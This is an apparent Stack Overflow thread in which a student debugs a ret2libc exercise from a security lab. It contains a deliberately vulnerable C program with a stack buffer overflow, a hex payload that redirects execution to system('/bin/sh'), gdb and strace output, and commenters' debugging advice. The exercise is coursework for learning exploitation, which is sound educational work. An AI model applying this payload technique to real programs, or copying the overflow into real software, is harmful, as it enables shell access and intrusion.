# Ret2LibC: system() argument "/bin/sh" throws error

Tags: c, gdb, buffer-overflow, libc

I'm trying to perform a Ret2LibC attack. My buffer to return address offset is 24 bytes. Therefore the first 24 bytes of my "bad file" are `AA`, and I overwrite the return address in th next 4 bytes with the address of the `system()` function. My next 4 bytes (I think this is the return address of the `system()` stack frame are the address of the `exit()` function. Finally, the next 4 bytes (which I believe should be the first argument of `system()`) are the address to an environment variable set to `/bin/sh`.

When I run the program, I get neither a shell prompt nor an error; the process just exits. I'm new to C and `gdb`, but when I debug the program with `gdb`, it appears to successfully overflow the buffer and return to `system()`, but when it reaches this point, `gdb` displays the following error:

```
__libc_system (line=0xbffffdf6 "/bin/sh") at ../sysdeps/posix/system.c:178
178 ../sysdeps/posix/system.c: No such file or directory.
```

From what I can understand about this error, it looks like it is calling `system("/bin/sh")` but it doesn't recognize `/bin/sh`. I can run `/bin/sh` from the command line and it works as expected.

I have also tried replacing the address of "/bin/sh" with a stable address inside of LibC, and I have the same issue.

What am I doing wrong here?

Here is the C program:

```
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(FILE *badfile)
{
    char buffer[BUF_SIZE];

    /* The following statement has a buffer overflow problem */
    fread(buffer, sizeof(char), 300, badfile);

    return 1;
}

int main(int argc, char **argv)
{
    FILE *badfile;

    char dummy[BUF_SIZE*5];  memset(dummy, 0, BUF_SIZE*5);

    badfile = fopen("badfile", "r");
    bof(badfile);

    printf("Returned Properly\n");
    fclose(badfile);
    return 1;
}
```

Compiled with: `gcc -fno-stack-protector -z noexecstack -o retlib -g retlib.c`

Here is "badfile":

```
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa a01d e4b7 d059 e3b7
2b28 f6b7 aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa
aaaa aaaa aaaa aaaa aaaa aaaa
```

And here are my known values:

```
buffer address: 0xbfffeca4
ebp: 0xbfffecb8

address of system(): 0xb7e41da0
address of exit(): 0xb7e359d0

address of "/bin/sh": 0xbffffdf6
```

Output of `strace -f ./retlib`:

```
execve("./retlib", ["./retlib"], ["XDG_VTNR=7", "XDG_SESSION_ID=c1", "XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed", "CLUTTER_IM_MODULE=xim", "SESSION=ubuntu", "ANDROID_HOME=/home/seed/android/android-sdk-linux", "GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1", "TERM=xterm-256color", "VTE_VERSION=4205", "XDG_MENU_PREFIX=gnome-", "SHELL=/bin/bash", "DERBY_HOME=/usr/lib/jvm/java-8-oracle/db", "QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1", "LD_PRELOAD=/home/seed/lib/boost/libboost_program_options.so.1.64.0:/home/seed/lib/boost/libboost_filesystem.so.1.64.0:/home/seed/lib/boost/libboost_system.so.1.64.0", "WINDOWID=62914570", "OLDPWD=/home/seed", "UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/1172", "GNOME_KEYRING_CONTROL=", "GTK_MODULES=gail:atk-bridge:unity-gtk-module", "USER=seed", "LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:", "QT_ACCESSIBILITY=1", "LD_LIBRARY_PATH=/home/seed/source/boost_1_64_0/stage/lib:/home/seed/source/boost_1_64_0/stage/lib:", "XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0", "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0", "SSH_AUTH_SOCK=/run/user/1000/keyring/ssh", "DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path", "XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg", "DESKTOP_SESSION=ubuntu", "PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin", "QT_IM_MODULE=ibus", "QT_QPA_PLATFORMTHEME=appmenu-qt5", "XDG_SESSION_TYPE=x11", "PWD=/home/seed/Desktop/Lab4-RetLibC", "JOB=unity-settings-daemon", "XMODIFIERS=@im=ibus", "JAVA_HOME=/usr/lib/jvm/java-8-oracle", "GNOME_KEYRING_PID=", "LANG=en_US.UTF-8", "GDM_LANG=en_US", "MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path", "COMPIZ_CONFIG_PROFILE=ubuntu-lowgfx", "IM_CONFIG_PHASE=1", "GDMSESSION=ubuntu", "SESSIONTYPE=gnome-session", "GTK2_MODULES=overlay-scrollbar", "SHLVL=1", "HOME=/home/seed", "XDG_SEAT=seat0", "LANGUAGE=en_US", "LIBGL_ALWAYS_SOFTWARE=1", "GNOME_DESKTOP_SESSION_ID=this-is-deprecated", "UPSTART_INSTANCE=", "UPSTART_EVENTS=xsession started", "XDG_SESSION_DESKTOP=ubuntu", "LOGNAME=seed", "MYSHELL=/bin/sh", "COMPIZ_BIN_PATH=/usr/bin/", "DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-M7ARuxwfpn", "J2SDKDIR=/usr/lib/jvm/java-8-oracle", "XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop", "QT4_IM_MODULE=xim", "LESSOPEN=| /usr/bin/lesspipe %s", "INSTANCE=", "UPSTART_JOB=unity7", "XDG_RUNTIME_DIR=/run/user/1000", "DISPLAY=:0", "XDG_CURRENT_DESKTOP=Unity", "GTK_IM_MODULE=ibus", "J2REDIR=/usr/lib/jvm/java-8-oracle/jre", "LESSCLOSE=/usr/bin/lesspipe %s %s", "XAUTHORITY=/home/seed/.Xauthority", "_=/usr/bin/strace"]) = 0
brk(NULL)                               = 0x804b000
fcntl64(0, F_GETFD)                     = 0
fcntl64(1, F_GETFD)                     = 0
fcntl64(2, F_GETFD)                     = 0
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fd5000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_dev=makedev(8, 1), st_ino=156704, st_mode=S_IFREG|0644, st_nlink=1, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=192, st_size=95395, st_atime=2020/08/05-12:54:57.228000000, st_mtime=2020/08/05-12:54:57.200000000, st_ctime=2020/08/05-12:54:57.200000000}) = 0
mmap2(NULL, 95395, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fbd000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320\207\1\0004\0\0\0\2047\33\0\0\0\0\0004\0 \0\n\0(\0F\0E\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0xN\26\0xN\26\0xN\26\0\23\0\0\0\23\0\0\0\4\0\0\0\4\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\357\32\0\f\357\32\0\5\0\0\0\0\20\0\0\1\0\0\0<\362\32\0<\2\33\0<\2\33\0\230,\0\0\340W\0\0\6\0\0\0\0\20\0\0\2\0\0\0\260\r\33\0\260\35\33\0\260\35\33\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0D\0\0\0D\0\0\0\4\0\0\0\4\0\0\0\7\0\0\0<\362\32\0<\2\33\0<\2\33\0\10\0\0\0H\0\0\0\4\0\0\0\4\0\0\0P\345td\214N\26\0\214N\26\0\214N\26\0\234a\0\0\234a\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\20\0\0\0R\345td<\362\32\0<\2\33\0<\2\33\0\304\35\0\0\304\35\0\0\4\0\0\0\1\0\0\0\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\222n\271\235I\312\262\345b*\363\212\260s\225\365\263 5\351\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0 \0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0E\204\0`\300\200\0\f\212\f\0\0010\0\10@2\10\252\0\210H6l\240\0368\0&\204\200\216\4\10B$", 512) = 512
fstat64(3, {st_dev=makedev(8, 1), st_ino=656871, st_mode=S_IFREG|0755, st_nlink=1, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=3496, st_size=1786484, st_atime=2020/08/05-12:26:47.552000000, st_mtime=2016/11/16-17:51:51, st_ctime=2017/07/25-14:50:11.543222817}) = 0
mmap2(NULL, 1792540, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e07000
mprotect(0xb7fb6000, 4096, PROT_NONE)   = 0
mmap2(0xb7fb7000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1af000) = 0xb7fb7000
mmap2(0xb7fba000, 10780, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fba000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ffd000
set_thread_area({entry_number:-1, base_addr:0xb7ffd940, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:6)
mprotect(0xb7fb7000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
munmap(0xb7fbd000, 95395)               = 0
brk(NULL)                               = 0x804b000
brk(0x806c000)                          = 0x806c000
open("badfile", O_RDONLY)               = 3
fstat64(3, {st_dev=makedev(8, 1), st_ino=417243, st_mode=S_IFREG|0664, st_nlink=1, st_uid=1000, st_gid=1000, st_blksize=4096, st_blocks=8, st_size=300, st_atime=2020/08/05-17:19:37.380000000, st_mtime=2020/08/05-17:19:19.424000000, st_ctime=2020/08/05-17:19:19.424000000}) = 0
read(3, "\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\240\35\344\267\320Y\343\267+(\366\267\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252\252", 4096) = 300
rt_sigaction(SIGINT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_IGN, [], 0}, {SIG_DFL, [], 0}, 8) = 0
rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
clone(strace: Process 9666 attached
child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfffeba4) = 9666
[pid  9666] rt_sigaction(SIGINT, {SIG_DFL, [], 0},  <unfinished ...>
[pid  9665] waitpid(9666,  <unfinished ...>
[pid  9666] <... rt_sigaction resumed> NULL, 8) = 0
[pid  9666] rt_sigaction(SIGQUIT, {SIG_DFL, [], 0}, NULL, 8) = 0
[pid  9666] rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
[pid  9666] execve("/bin/sh", ["sh", "-c", "/bin/sh"], [0xaaaaaaaa, "XDG_SESSION_ID=c1", "XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/seed", "CLUTTER_IM_MODULE=xim", "SESSION=ubuntu", "ANDROID_HOME=/home/seed/android/android-sdk-linux", "GPG_AGENT_INFO=/home/seed/.gnupg/S.gpg-agent:0:1", "TERM=xterm-256color", "VTE_VERSION=4205", "XDG_MENU_PREFIX=gnome-", "SHELL=/bin/bash", "DERBY_HOME=/usr/lib/jvm/java-8-oracle/db", "QT_LINUX_ACCESSIBILITY_ALWAYS_ON=1", "WINDOWID=62914570", "OLDPWD=/home/seed", "UPSTART_SESSION=unix:abstract=/com/ubuntu/upstart-session/1000/1172", "GNOME_KEYRING_CONTROL=", "GTK_MODULES=gail:atk-bridge:unity-gtk-module", "USER=seed", "LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:", "QT_ACCESSIBILITY=1", "XDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0", "XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0", "SSH_AUTH_SOCK=/run/user/1000/keyring/ssh", "DEFAULTS_PATH=/usr/share/gconf/ubuntu.default.path", "XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/usr/share/upstart/xdg:/etc/xdg", "DESKTOP_SESSION=ubuntu", "PATH=/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin", "QT_IM_MODULE=ibus", "QT_QPA_PLATFORMTHEME=appmenu-qt5", "XDG_SESSION_TYPE=x11", "PWD=/home/seed/Desktop/Lab4-RetLibC", "JOB=unity-settings-daemon", "XMODIFIERS=@im=ibus", "JAVA_HOME=/usr/lib/jvm/java-8-oracle", "GNOME_KEYRING_PID=", "LANG=en_US.UTF-8", "GDM_LANG=en_US", "MANDATORY_PATH=/usr/share/gconf/ubuntu.mandatory.path", "COMPIZ_CONFIG_PROFILE=ubuntu-lowgfx", "IM_CONFIG_PHASE=1", "GDMSESSION=ubuntu", "SESSIONTYPE=gnome-session", "GTK2_MODULES=overlay-scrollbar", "SHLVL=1", "HOME=/home/seed", "XDG_SEAT=seat0", "LANGUAGE=en_US", "LIBGL_ALWAYS_SOFTWARE=1", "GNOME_DESKTOP_SESSION_ID=this-is-deprecated", "UPSTART_INSTANCE=", "UPSTART_EVENTS=xsession started", "XDG_SESSION_DESKTOP=ubuntu", "LOGNAME=seed", "MYSHELL=/bin/sh", "COMPIZ_BIN_PATH=/usr/bin/", "DBUS_SESSION_BUS_ADDRESS=unix:abstract=/tmp/dbus-M7ARuxwfpn", "J2SDKDIR=/usr/lib/jvm/java-8-oracle", "XDG_DATA_DIRS=/usr/share/ubuntu:/usr/share/gnome:/usr/local/share/:/usr/share/:/var/lib/snapd/desktop", "QT4_IM_MODULE=xim", "LESSOPEN=| /usr/bin/lesspipe %s", "INSTANCE=", "UPSTART_JOB=unity7", "XDG_RUNTIME_DIR=/run/user/1000", "DISPLAY=:0", "XDG_CURRENT_DESKTOP=Unity", "GTK_IM_MODULE=ibus", "J2REDIR=/usr/lib/jvm/java-8-oracle/jre", "LESSCLOSE=/usr/bin/lesspipe %s %s", "XAUTHORITY=/home/seed/.Xauthority", "_=/usr/bin/strace"]) = -1 EFAULT (Bad address)
[pid  9666] exit_group(127)             = ?
[pid  9666] +++ exited with 127 +++
<... waitpid resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], 0) = 9666
rt_sigaction(SIGINT, {SIG_DFL, [], 0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL, [], 0}, NULL, 8) = 0
rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=9666, si_uid=1000, si_status=127, si_utime=0, si_stime=0} ---
exit_group(-1431655766)                 = ?
+++ exited with 170 +++
```

Comment: Probably some error in your code.  Please post a [mcve] so we can reproduce the problem and help you debug it.

Comment: @user3629249 I've added the program, badfile, and a list of known memory addresses

Comment: OT: regarding; `int main(int argc, char **argv)`  Since the parameters are not used, the compiler will output two warning messages about unused parameters.  To correct that problem, suggest using the other valid signature for `main()`   `int main( void )`

Comment: regarding: `/* The following statement has a buffer overflow problem */
    fread(buffer, sizeof(char), 300, badfile);`  since the `buffer[]` is only 12 bytes long, cannot use `300`.   Also, should be checking the returned value from `fread()` to know if the function was successful, if EOF was encountered, etc

Comment: regarding: `__libc_system (line=0xbffffdf6 "/bin/sh") at ../sysdeps/posix/system.c:178
178 ../sysdeps/posix/system.c: No such file or directory.`  It is very unlikely that you have the source for `system.c` at a location where `gdb` can see it.  The easiest way to handle this problem is to use the `n` command when the next instruction to executed is the `system` statement.

Comment: OT: regarding: `char dummy[BUF_SIZE*5];  memset(dummy, 0, BUF_SIZE*5);`  Please follow the axiom: *only one statement per line and (at most) one variable declaration per statement.

Comment: OT: regarding: `badfile = fopen("badfile", "r");`  always check (!=NULL)  the returned value from `fopen()` to assure the operation was successful.  When not successful (==NULL) then call: `perror( "fopen for input file failed");`  to output both your error message and the text reason the system thinks the error occurred to `stderr`.  Followed by: `exit( EXIT_FAILURE );`

Comment: I’m copying 300 bytes of the file into the buffer because I want it to overflow. Also, while I appreciate your dedication to the above best-practices, most of the C code was provided to me by the instructor of the class I am doing this for, and I have no background in C, so I assume it to be correct.

Comment: I ran your code, the result is: `*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)`  I used an exact copy of the file you posted.

Comment: Sorry, I forgot to specify that I compiled with `-fno-stack-protector` and `-z noexecstack`. The full compilation command is now in the question below the C code.

Comment: Can you run `strace -f ./retlib` and see what the process created by `system` does? strace will show all the syscalls and their arguments.

Comment: @MarkPlotnick I added the output of `strace -f ./retlib` to the bottom of the question

Comment: The first argument of the `execve()` call (`0xaaaaaaaa`) makes me think that I'm unintentionally passing additional arguments to `system()`, but as far as I know, it only accepts a command

Comment: Can you add a `-v` option to that strace command and run it again? `execve("/bin/sh", ["sh", "-c", "/bin/sh"], [/* 71 vars */]) = -1 EFAULT (Bad address)` seems to imply one of the environment pointers is bad. Maybe you're overwriting a bit too much of the stack and it's bashing some of those pointers.

Comment: @MarkPlotnick The full output is now above

Comment: OK. Look at that execve line again, and see that the first environment pointer is `0xaaaaaaaa` instead of a `"var=value"` string? You overwrote just a few bytes too much.

Comment: I reduced the size of the `badfile` from 300 bytes to 37 bytes and it still exits with code 170